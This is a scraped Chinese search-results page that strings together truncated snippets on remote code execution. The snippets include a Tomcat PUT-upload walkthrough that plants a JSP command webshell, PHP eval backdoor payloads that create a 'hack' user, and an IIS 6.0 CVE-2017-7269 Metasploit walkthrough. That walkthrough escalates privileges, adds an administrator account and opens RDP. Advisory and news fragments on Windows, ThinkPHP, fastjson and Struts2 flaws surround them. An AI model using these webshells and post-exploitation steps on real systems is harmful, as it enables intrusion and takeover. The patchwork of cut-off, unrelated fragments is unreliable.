精华内容
参与话题
问答
  • 远程代码执行

    2020-07-06 19:56:16
    Tomcat 运行在Windows 主机上,且启用了 HTTP PUT 请求方法,可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行。 影响版本: Apache Tomcat 7.0.0 – 7.0.81 2、 漏洞复现 配置漏洞,...

    1、 漏洞简介及成因

    Tomcat 运行在Windows 主机上,且启用了 HTTP PUT 请求方法,可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行。

    影响版本: Apache Tomcat 7.0.0 – 7.0.81

    2、 漏洞复现

    配置漏洞,开启put方法可上传文件功能。
    tomcat文件夹下的/conf/web.xml文件插入:

    <init-param>
    
               <param-name>readonly</param-name>
    
               <param-value>false</param-value>
    
         </init-param>
    

    重启tomcat服务。
    在这里插入图片描述
    访问127.0.0.1:8080,burp抓包,send to Repeater,将请求方式改为PUT,创建一个122.jsp,并用%20转义空格字符。123.jsp内容为:

    <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
    

    返回201,说明创建成功。在这里插入图片描述
    访问127.0.0.1:8080/122.jsp?cmd=calc。

    弹出计算器:在这里插入图片描述

    3、 漏洞修复

    1)检测当前版本是否在影响范围内,并禁用PUT方法。

    2)更新并升级至最新版。

    展开全文
  • NodeJS远程代码执行

    2020-10-21 15:52:50
    主要介绍了NodeJS远程代码执行方法的相关资料,需要的朋友可以参考下
  • 代码执行漏洞和命令执行漏洞。 二者区别是代码执行漏洞执行和操作系统命令是通过脚本来执行,而命令执行漏洞是直接调用操作系统命令。但是本人觉得这个概念好像不是很重要,反正都是代码。 示例1...

    远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

    代码执行漏洞和命令执行漏洞。
    二者区别是代码执行漏洞执行和操作系统命令是通过脚本来执行,而命令执行漏洞是直接调用操作系统命令。但是本人觉得这个概念好像不是很重要,反正都是代码。


    示例1
    比如说在网站后台有这样一段php代码在lab.php中

    <?php
    eval($_GET['payload']);
    ?>
    

    可以构造paload:url/lab.php?payload=phpinfo();
    就可以获得php的配置信息。

    示例2
    再比如某些网页中输入url,会在后台执行ping命令的输入框,可以利用命令连接执行来利用漏洞。
    例构造任意ip && net user 就可以在ping命令执行后再执行new user命令

    windows或linux下shell执行顺序:
    command1 && command2 先执行command1后执行command2
    command1 | command2 只执行command2
    command1 & command2 先执行command2后执行command1


    php中常见与系统有关的函数
    system() 执行一个外部应用程序的输入并显示输出结果
    exec() 执行一个外部的应用程序,但不显示输出的结果
    shell_exec() 执行shell命令并返回输出的结果字符串
    passthru() 执行一个系统命令并显示原始的输出

    示例
    1、获取目标机器的网络信息
    url/lab.php?payload=system(“ipconfig”);
    2、在靶机上新建一个用户
    url/lab.php?payload=system(“net user hack 123 /add”);


    所以为了安全起见,在自己搭建的网站中,尽量不使用eval()函数
    尽量不要使用系统执行命令,因为有可能被利用命令连接
    在执行命令或方法前要做好过滤工作

    展开全文
  • thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
  • 一、漏洞描述 IIS 6.0的WebDAV 有毛病 二、影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三、漏洞环境搭建 1.Windows server 2003 R2 安装IIS服务,开启了WebDAV ...3.IIS6.exe提权工具 pr.exe ...

    一、漏洞描述

    IIS 6.0的WebDAV 有毛病

    二、影响版本以及利用条件

    Windows 2003 R2开启WebDAV服务的IIS6.0

    三、漏洞环境搭建
    1.Windows server 2003 R2 安装IIS服务,开启了WebDAV
    2.Exp下载地址:https://github.com/zcgonvh/cve-2017-7269
    3.IIS6.exe提权工具 pr.exe
    4.3389.bat

    四、漏洞复现

    1.IIS开启WebDAV
    在这里插入图片描述
    2.github下载exp
    在这里插入图片描述

    3.把exp放入到msf中,#注意模块的命名名称,单词之间加下划线

    cp cve-2017-7269.rb  /usr/share/metasploit-framework/modules/exploits/windows/iis/
    

    4.使用模块,设置参数
    在这里插入图片描述

    5.开始攻击,获得一个shell,获得的是一个低权限用户 #攻击失败需要恢复快照
    在这里插入图片描述

    提权、pr.exe提权

    15.或者上传pr.exe到目标主机

    在这里插入图片描述

    16.创建用户
    在这里插入图片描述

    17.把创建的用户加入到管理员组中
    在这里插入图片描述

    18.上传3389.bat
    在这里插入图片描述

    19.开启目标的3389端口
    在这里插入图片描述

    20.查看目标是否开启了3389端口
    在这里插入图片描述

    21.远程桌面连接
    在这里插入图片描述

    五、漏洞修复

    禁用WebDAV

    展开全文
  • 有传言称今天这波windows补丁是补了影子经纪人要爆的漏洞今天爆出两个远程代码执行漏洞(CVE-2017-8543)Windows Search远程代码执行漏洞(可用s...
        

    有传言称今天这波windows补丁是补了影子经纪人要爆的漏洞

    今天爆出两个远程代码执行漏洞(CVE-2017-8543)Windows Search远程代码执行漏洞(可用smb 远程攻击)和(CVE-2017-8464)LNK文件(快捷方式)远程代码执行漏洞(lnk 漏洞,当年震网木马就是用了这个)

    https://threatpost.com/microsoft-patches-two-critical-vulnerabilities-under-attack/126239/  

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8543 

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464 

    https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms

    中文资讯:http://bobao.360.cn/learning/detail/3977.html

    Windows Search远程代码执行漏洞

    Windows搜索服务(WSS)是windows的一项默认启用的基本服务。允许用户在多个Windows服务和客户端之间进行搜索。当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

    为了利用此漏洞,攻击者可以向Windows Search服务发送精心构造的SMB消息。从而利用此漏洞提升权限并控制计算机。此外,在企业场景中,未经身份验证的攻击者可以通过SMB服务连接远程触发漏洞,然后控制目标计算机。

    影响系统

    桌面系统:Windows 10, 7, 8, 8.1, Vista, Xp和Windows RT 8.1

    服务器系统:Windows Server 2016,2012,2008, 2003

    修复方案:

    桌面系统Windows 10, 7, 8.1和Windows RT 8.1;服务器系统:Windows Server 2016,2012,2008,可以通过Windows Update自动更新微软补丁的方式进行修复。

    Windows 8, Vista, Xp和Windows Server 2003 可以通过选择对应版本然后手动更新补丁的方式进行更新

    https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms 

    LNK文件(快捷方式)远程代码执行漏洞


    如果用户打开攻击者精心构造的恶意LNK文件,则会造成远程代码执行。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。

    攻击者可以通过可移动驱动器(U盘)或远程共享等方式将包含恶意LNK文件和与之相关的恶意二进制文件传播给用户。当用户通过Windows资源管理器或任何能够解析LNK文件的程序打开恶意的LNK文件时,与之关联的恶意二进制代码将在目标系统上执行。

    受影响版本

    桌面系统:Windows 10, 7, 8.1, 8, Vista和Windows RT 8.1

    服务器系统:Windows Server 2016,2012,2008

    修复方案:

    桌面系统Windows 10,7,8.1和Windows RT 8.1;服务器系统:Windows Server 2016,2012,2008,可以通过Windows Update自动更新微软补丁的方式进行修复。

    Windows 8, Vista可以通过选择对应版本然后手动更新补丁的方式进行更新

    https://support.microsoft.com/zh-cn/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms

    卡巴斯基原文:

    0?wx_fmt=jpeg

    MICROSOFT PATCHES TWO CRITICAL VULNERABILITIES UNDER ATTACK

    by Tom SpringJune 13, 2017 , 4:23 pm

    Microsoft’s Patch Tuesday update today included a massive 95 fixes that tackle vulnerabilities in Windows, Office, Skype, Internet Explorer and its Edge browser. Twenty-seven of Microsoft’s patches fix remote code execution issues, allowing attackers to remotely take control of a victim’s PC. Eighteen patches are rated critical by Microsoft, 76 important and one is rated moderate.

    Of greatest concern are two vulnerabilities currently under attack that include a Windows Search Remote Code Execution Vulnerability (CVE-2017-8543) and a LNK Remote Code Execution Vulnerability (CVE-2017-8464).

    The more serious of the two, the Windows Search Remote Code Execution Vulnerability patch, tackles a RCE in the Windows OS found the Windows Search Service (WSS), a feature in Windows that allows users to search across multiple Windows services and clients.

    “In an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer,” according to the bulletin. Affected are Windows Server 2016, 2012, 2008 as well as desktop systems like Windows 10, 7 and 8.1.

    The second vulnerability actively being exploited is the LNK Remote Code Execution Vulnerability, that allows a RCE if a specially crafted shortcut is displayed to a user. “If you’re experiencing déjà vu reading the bug title, it’s certainly understandable. This type of vulnerability was used by the Stuxnet malware, then found again several years later through a ZDI program submission,” according to Patch Tuesday commentary by Zero Day Initiative (ZDI).

    Those critical patches were supplemented Tuesday by additional patches released by Microsoft on the same day that address fixes for unsupported versions of Windows such as Windows XP and Windows Server 2003. The fixes are meant to prevent the stop the WannaCry ransomware outbreak from last month. The patch follows an emergency patch released just weeks ago, also for XP. The updates can be found at Microsoft Download Center, but won’t be automatically be delivered through Windows Update.

    According security experts at Qualys, another high-priority issue for sysadmin should be a Windows Graphics RCE Vulnerability (CVE-2017-8527). This vulnerability is triggered when users view a malicious website with specially crafted fonts. “A remote code execution vulnerability exist when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system,” Microsoft notes.

    “Overall it’s a large security update which is almost double as compared to last two months in the number of patched vulnerabilities. Actively exploited SMB issue CVE-2017-8543 and other Font, Outlook, Office, Edge and IE issues are sure to keep system administrators and security teams busy,” said Amol Sarwate, director of engineering at Qualys.

    Sarwate advises organizations using Outlook that they should also prioritize a patch for a Microsoft Office Memory Corruption Vulnerability (CVE-2017-8507), which attackers can exploit by sending a malicious e-mail to a target and take complete control when the recipient views the message in Outlook.

    Lastly, Microsoft patches Microsoft Edge and IE for several remote code execution issues (CVE-2017-8498, CVE-2017-8530 and CVE-2017-8523) that are particularly important as they have been publicly disclosed although no attacks have been observed yet, according to Qualys.

    Earlier in the day, Adobe fixed 21 vulnerabilities across four products – Flash, Shockwave Player, Captivate, and Adobe Digital Editions.

    展开全文
  • tomcat远程代码执行漏洞验证
  • 主要给大家介绍了关于Android中WebView远程代码执行漏洞的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
  • 远程命令执行漏洞的原理 远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端 没有针对执行函数做 过滤,导致在没有指定绝对...上传jsp木马所造成的远程代码执行漏洞。 知默认情况下是禁止http请求...
  • fastjson远程代码执行漏洞问题分析

    千次阅读 2020-03-01 16:15:11
    fastjson远程代码执行安全漏洞(以下简称RCE漏洞),最早是官方在2017年3月份发出的声明, security_update_20170315 没错,强如阿里这样的公司也会有漏洞。代码是人写的,有漏洞是难免的。关键是及时的修复。 声明中...
  • ThinkPHP 5.0 远程代码执行漏洞分析
  • Office 远程代码执行漏洞复现过程

    千次阅读 2018-03-30 00:00:00
    本文来自作者 肖志华 在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录。编辑 | 天津饭直接贴本地复现过程,至于怎么利用还请自己思考。2017年11月14日,微软发布了11月份的...
  • Android WebView远程代码执行漏洞简析

    千次阅读 2016-02-16 20:17:39
    0x00 本文参考Android WebView 远程代码执行漏洞简析。代码地址为,https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo。下面我们分析代码。 0x01 首先列出项目工程目录: MainActivity....
  • 漏洞原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如:当你提交的登录表单为username=admin&...
  • Metasploit远程代码执行

    2018-11-02 12:35:26
    Metasploit之远程代码执行 本次漏洞利用的是ms08-067的XP漏洞 metasploit下进行操作 search 08-067 --&gt;搜索漏洞相关的模块,得到exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms08_067_...
  • Webview远程代码执行

    2019-09-17 17:13:12
    APKtools反编译后,查看该应用SDK版本号小于17
  • 2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的JAVA Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令...
  • 远程命令执行漏洞简介 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个...
  • 本文给大家介绍的是PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
  • 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞原理:攻击者通过特制的RPC请求发给存在漏洞的主机,将可导...
  • thinkphp远程代码执行漏洞

    万次阅读 2018-12-11 00:49:26
    0x00前言 近日thinkphp团队发布了版本更新... 影响范围:5.x &lt; 5.1.31, &lt;= 5.0.23 ...危害:远程代码执行 0x01漏洞原理 首先我们来看url http://localhost/public/index.php?s=index/\think\Cont...
  • 扫端口的时候遇到8161端口,输入admin/admin,成功登陆,之前就看到过相关文章,PUT了一句话上去,但是没有什么效果,于是本地搭建了一个环境,记录一下测试过程。 环境搭建: ... 解压后,双击运行abtivemq.bat运行。...
  • WordPress5.0.0 远程代码执行

    千次阅读 2019-03-04 14:11:26
    这篇博文讲述了利用目录穿越和本地文件包含漏洞的“组合拳”在WordPress核心功能实现远程代码执行。过去6年,该WordPress漏洞一直未被揭示。 影响 【POC视频1】 攻击者需要在目标WordPress网站拥有至少作者级权限的...
  • iis6.0远程代码执行漏洞复现
  • Apache Struts 2是世界上最流行的Java Web服务器框架之一,当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除...
  • 今天公司代码安全测试提出来一个问题:HTTP_Java静态调用_java.lang.Runtime_远程代码执行! 百度查询资料,发现是fastjson架包的安全漏洞问题,在com.alibaba.fastjson原来使用的是1.1.42版本的! 我升级到了...

空空如也

1 2 3 4 5 ... 20
收藏数 8,398
精华内容 3,359
关键字:

远程代码执行